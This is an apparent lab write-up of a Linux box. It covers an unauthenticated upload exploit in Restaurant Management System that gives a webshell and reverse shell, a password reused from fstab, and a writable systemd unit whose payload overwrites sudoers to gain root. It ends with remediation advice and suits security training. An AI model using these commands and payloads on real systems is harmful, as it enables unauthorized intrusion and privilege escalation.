Case file

Restaurant CMS upload RCE and writable systemd reboot to root

Intermediate Linux engagement: Sourcecodester Restaurant Management System on a nonstandard HTTP port accepted an unauthenticated upload (EDB-47520); fstab credentials unlocked SSH as edward; a world-writable systemd unit plus sudo reboot rewrote sudoers for root.

Intermediate28 minLinux · Web · Systemd · Privilege Escalation
01

Engagement summary

Apache on port 12340 hosted RMS. Unauth file upload yielded an apache shell; CIFS credentials in fstab reused for edward; writable zeno-monitoring.service plus NOPASSWD reboot completed root.

Against ZENO (10.10.229.206), full-port scanning found OpenSSH and HTTP on 12340 serving Restaurant Management System under /rms/. Exploit-DB 47520 uploaded a PHP webshell via admin/foods-exec.php into images/, giving command execution as apache. /etc/fstab contained a commented CIFS mount with password FrobjoodAdkoonceanJa, reused for SSH as edward. sudo -l allowed /usr/sbin/reboot without a password, and /etc/systemd/system/zeno-monitoring.service was world-writable. We rewrote ExecStart to plant a sudoers rule, rebooted, and returned as edward with unrestricted sudo.

Business impact

Unauthenticated CMS uploads are remote code execution. Secrets left in fstab comments become SSH keys in practice. World-writable systemd units combined with reboot privileges are a root backdoor. Remove legacy RMS, scrub mount credentials from world-readable files, and lock unit file permissions to root:root 644.

02

Nonstandard HTTP and RMS upload RCE

gobuster found /rms/. EDB-47520 deployed reverse-shell.php; a reverse shell landed as apache.

OPERATOR · NMAP

savvy@lab:~$ nmap -sSCV -p- 10.10.229.206

22/tcp open ssh OpenSSH

12340/tcp open http Apache httpd

savvy@lab:~$ gobuster dir -u http://10.10.229.206:12340/ -w directory-list-2.3-medium.txt

/rms (Status: 301)

OPERATOR · EDB-47520

savvy@lab:~$ python3 47520.py http://10.10.229.206:12340/rms/

savvy@lab:~$ curl 'http://10.10.229.206:12340/rms/images/reverse-shell.php?cmd=id'

uid=48(apache) gid=48(apache)

savvy@lab:~$ nc -nvlp 4444

# trigger bash reverse shell via webshell cmd parameter

savvy@lab:/$ id

03

fstab credential reuse to edward

Commented CIFS credentials in /etc/fstab authenticated SSH as edward.

OPERATOR · FSTAB

savvy@lab:~$ cat /etc/fstab

# username=zeno password=FrobjoodAdkoonceanJa

savvy@lab:~$ ssh edward@10.10.229.206

savvy@lab:~$

04

Writable systemd unit and sudo reboot

Overwrote zeno-monitoring.service ExecStart to plant sudoers, then rebooted with NOPASSWD reboot.

PAYLOAD

zeno-monitoring.service

[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/bin/sh -c 'echo "edward ALL=(root) NOPASSWD: ALL" > /etc/sudoers'
[Install]
WantedBy=multi-user.target

OPERATOR · ROOT

savvy@lab:~$ sudo -l

(ALL) NOPASSWD: /usr/sbin/reboot

savvy@lab:~$ ls -la /etc/systemd/system/zeno-monitoring.service

-rw-rw-rw- 1 root root ... zeno-monitoring.service

savvy@lab:~$ sudo /usr/sbin/reboot

savvy@lab:~$ ssh edward@10.10.229.206

savvy@lab:~$ sudo su

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Patch or remove Restaurant Management System; block unauthenticated uploads. Never store share passwords in world-readable fstab comments. Unit files must be root-owned 644; do not grant reboot without also protecting unit contents.